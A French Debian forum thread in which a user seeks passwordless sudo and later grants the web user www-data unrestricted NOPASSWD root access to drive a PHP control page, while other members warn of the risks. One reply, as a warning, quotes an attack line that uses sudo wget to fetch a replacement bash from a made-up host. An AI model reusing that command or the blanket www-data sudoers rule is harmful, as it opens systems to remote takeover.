Utilisé sudo sans mot de passe demandé

Support Debian
#1

Bonjour,

Je voudrai utiliser sudo sans mot de passe demandé, j’ai suivie ce tuto
wiki.debian-facile.org/logiciel:sudo

Je suis sous debian squeeze 2.6.39.4, sudo eté dèjas installé
J’ai édité le fichier /etc/sudoers

l’utilisateur

Fichier /etc/sudoers

[code]root@debian:~# cat /etc/sudoers

/etc/sudoers

This file MUST be edited with the ‘visudo’ command as root.

See the man page for details on how to write a sudoers file.

Defaults env_reset

Host alias specification

User alias specification

Cmnd alias specification

User privilege specification

root ALL=(ALL) ALL
#serveur ALL=(root) ALL # sudo avec un mot de passe demandé
serveur ALL=NOPASSWD: ALL # sudo sans mot de passe demandé

Allow members of group sudo to execute any command

(Note that later entries override this, so you might need to move

it further down)

%sudo ALL=(ALL) ALL

#includedir /etc/sudoers.d

#%sudo ALL=(root) ALL
root@debian:~#
[/code]

Afin de vérificer si sudo fonctionne, j’ai tapé $ sudo fdisk -l il me demande le mot de passe ???

serveur@debian:~$ sudo fdisk -l [sudo] password for serveur:

Comment faire pour que sudo ne me demande plus le mot de passe ?

Merci.

#2

[quote][code]# (Note that later entries override this, so you might need to move

it further down)

%sudo ALL=(ALL) ALL[/code][/quote]
Peut-être que ce n’est pas ça le problème, mais moi j’essaierais quand même de mettre ma ligne après celle-ci :slightly_smiling: .

#3

Tout ce que je peux dire, et je pense que je ne suis pas seul à le penser, c’est que ce n’est pas une bonne idée.
Il m’étonnerait que quelqu’un de censé te donne la solution.

#4

Salut,

Ne compte pas sur moi qui suis pourtant un adepte de sudo pour transformer ta machine en passoire “Win”.

Je sors immédiatement pour ne pas entendre plus de bêtises.

#5

Effectivement, par exemple en ce moment le Java 1.7 de Sun permet d’éxécuter du code sur une machine. Tu peux être sûr que si le sudo est configuré sans l’option requiretty et surtout tty_tickets (que le mainteneur de debian avait mis à off par défaut, j’ignore si c’est encore le cas mais je ne crois pas, on avait eu un débat assez vif!!), tu es à la merci de n’importe quel site où tu te balades (le script fait par exemple (cd /bin/ ; sudo wget warez.kid.nul/bash.new ; sudo mv bash.new bash)…

Si vraiment ça te motive, une erreur fréquente est l’oubli des droits de /etc/sudoers

#6

Alors relis le tuto en pensant à cela.

[quote=“xunil2003”]# nano /etc/sudoers[/quote]…
Tu n’as pas lu les avertissement du tuto:

[quote=“xunil2003”]Bonjour,

Je voudrai utiliser sudo sans mot de passe demandé, j’ai suivie ce tuto
wiki.debian-facile.org/logiciel:sudo[/quote]
T’as pas vu le gros cadre rouge en pein milieu du tuto, pour expliquer de ne pas faire ceci (sauf cas tres particuliers cités )?

[quote=“tuto debian facile”] Ceci est une utilisation réservée :
aux machines non connectées sur la toile
(…)[/quote]

et la tu as écris:

Haha , tu nous fais marcher la en faite ? :wink:

Lis le tuto en entier avant d’aller dire des bêtises sur ce dernier ailleur.

En tout cas, je fais cela sur des VM non reliées au réseau; et je peux te dire que t’as même pas besoin de modifier le fichier sudoers.
Mais si t’avais lu le tuto tu le saurais :016

Pauvre martin_qc mdr !

#7

Salut,

Merci François,

J’avais loupé “requiretty” que j’ai ajouté immédiatement :slightly_smiling:

#8

[quote=“ggoodluck47”]Salut,

Merci François,

J’avais loupé “requiretty” que j’ai ajouté immédiatement :slightly_smiling:[/quote]

Note que si tu utilises sudo dans des scripts, il ne faut pas mettre cette option. Cette option n’autorise sudo que utilisé dans une console.

#9

laisse tomber sudo;chaque fois que nécessaire tu te loges root,tu fais tes affaires et après tu fais “exit” dans l’invite de commandes et ainsi tu ne te feras jamais fourber,sudo et tous ces trucs c’est du windows où n’importe qui peut écrire et éxécuter n’importe quoi n’importe où.

#10

Bonjour;

Merçi a tous pour vos réponses.

sudo est sur ubuntu aussi alors si c’est pas fiable ???
Ok mais pour que www-data est les droits sans fail de sécurité, pour executer, lire des fichiers, etc… comment faire alors si sudo craint ?

Par exemple, J’essaie depuis php de pouvoir démarrer, stopper, redémarrer un programme avec un script php, mais il y a un problème de droit.

Code php

[code]

Application


Amule


<?php

if (isset($_POST[‘Application1-On’])){

$commande = “/etc/init.d/amule-daemon start”;
exec("$commande", $top, $error );
echo nl2br(implode("\n",$top));
if ($error){
exec(’/usr/bin/top n 1 b 2>&1’, $error );
echo "Error: ";
exit($error[0]);
}
}
?>



Fichier /var/log/apache2/error.log
/var/log/apache2/error.log[/code]

root@debian:# cat /var/log/apache2/error.log sh: /etc/init.d/service: not found start-stop-daemon: unable to set gid to 1000 (Operation not permitted)

Pourtant j’ai lus quelque part sur le net qu’il faut utiliser sudo pour www-data afin d’avoir les permissions ?

Merci.

#11

Et si Windows est installé sur 90% des ordinateurs de bureau c’est bien qu’il doit être fiable non ? :mrgreen:

Le cas que tu cites là est précisément ce pour quoi sudo est conçu : permettre à UN utilisateur donné d’exécuter UNE commande donnée en tant que root. Mais ce que tu demandes dans ton premier message n’a rien à voir avec ce cas d’utilisation : tu voulais permettre à TOUS les utilisateurs d’exécuter N’IMPORTE QUELLE commande en tant que root (avec ou sans mot de passe, à ce niveau ça n’a plus grande importance).
Pour faire ce dont tu parles, effectivement NOPASSWD est nécessaire puisqu’il n’y a pas d’utilisateur pour saisir le mot de passe, mais il faut faire en sorte que seul l’utilisateur www-data puisse exécuter /etc/init.d/amule-daemon via sudo sans mot de passe.

#12

bonjour,

Oui j’ai fait un test sur l’user serveur afin de verifier le fonctionnement de sudo.
Je suis d’accord avec vous
mais sur un serveur il y a plein de chose à traiter car les pages en Php son plus simple à utiliser pour un utilisateur qui clique sur un bouton pour executé le travail au lieu de taper en ligne de commande.
Sur mon pack informatique le serveur doit faire :
des copies de fichier aux postes et inverse
des sauvegardes
lire le contenue de certains fichiers
etc…

un exemple tout bête pour faire une copie il faut bien utiliser “sudo cp /machin /ip/chose” sinon il faut faire une fail de sécurité volontaire que seul soi même connais la fail, genre ;
rendre une commande exécutable avec les permissions root en tant que simple utilisateur

Ce qui veut dire que chaque fois que j’utiliserai bcopy a la place de cp, la commande sera exécuté avec les permissions root.

Merci.

#13

[quote=“xunil2003”]mais sur un serveur il y a plein de chose à traiter car les pages en Php son plus simple à utiliser pour un utilisateur qui clique sur un bouton pour executé le travail au lieu de taper en ligne de commande.
Sur mon pack informatique le serveur doit faire :
des copies de fichier aux postes et inverse
des sauvegardes
lire le contenue de certains fichiers
etc…[/quote]
Ça ne change rien au principe. Pour chaque commande que le serveur web doit pouvoir exécuter, il suffit d’ajouter une autorisation dans sudoers pour cette commande spécifique, uniquement pour l’utilisateur concerné (www-data).
En tous cas j’espère que ton interface web est correctement protégée (SSL + authentification) car sinon tu t’exposes à de sacrés problèmes…

#14

La ligne “serveur ALL = NOPASSWD: ALL” me semble être celle qu’il te faut… Essaye de l’entrer avec visudo et ce dernier te dira s’il y a une faute de syntaxe dans ton fichier sudoers.

#15

Non ce n’est pas ce qu’il lui faut, mais ce qu’il veut. Ça fait une sacrée différence, sachant que ce qu’il veut est une hérésie complète (comme on s’échine à expliquer depuis le départ) ! :wink:

#16

Bonsoir,

Donc j’ai taper visudo
nano ma ouvert le fichier /etc/sudoers
J’ai ajouté

Puis j’ai ajouté www-data au groupe sudo

root@debian:~# visudo root@debian:~# adduser www-data sudo Ajout de l'utilisateur « www-data » au groupe « sudo »... Ajout de l'utilisateur www-data au groupe sudo Fait. root@debian:~#

Fichier /etc/sudoers

[code]root@debian:~# cat /etc/sudoers

/etc/sudoers

This file MUST be edited with the ‘visudo’ command as root.

See the man page for details on how to write a sudoers file.

Defaults env_reset

Host alias specification

User alias specification

Cmnd alias specification

User privilege specification

root ALL=(ALL) ALL

Allow members of group sudo to execute any command

(Note that later entries override this, so you might need to move

it further down)

%sudo ALL=(ALL) ALL
#serveur ALL=(root) ALL # sudo avec un mot de passe demmandé
#serveur ALL=NOPASSWD: ALL # sudo sans mot de passe demmandé
www-data ALL=NOPASSWD: ALL # sudo sans mot de passe demmandé

#includedir /etc/sudoers.d

#serveur ALL=(root) ALL
root@debian:~# [/code]

Es-ce correcte maintenant ?
Comment supprimer serveur du goupe sudo ?

Merci.

#17

Salut,

nano étant un éditeur, en t’en que tel … :083

#18

Bonsoir,

Je je tape

Il n’y aura plus l’utilisateur serveur ors je souhaite le supprimer du groupe sudo.
voulez vous dire plutôt

Merci

#19

Tout à fait!

~# deluser loreleil saned Suppression de l'utilisateur « loreleil » du groupe « saned »... Fait. root@pc-2-loreleil:~#

#20

bonsoir,

Dernière question.
Que faut il taper pour afficher tout les utilisateurs du groupe sudo ?

Merci.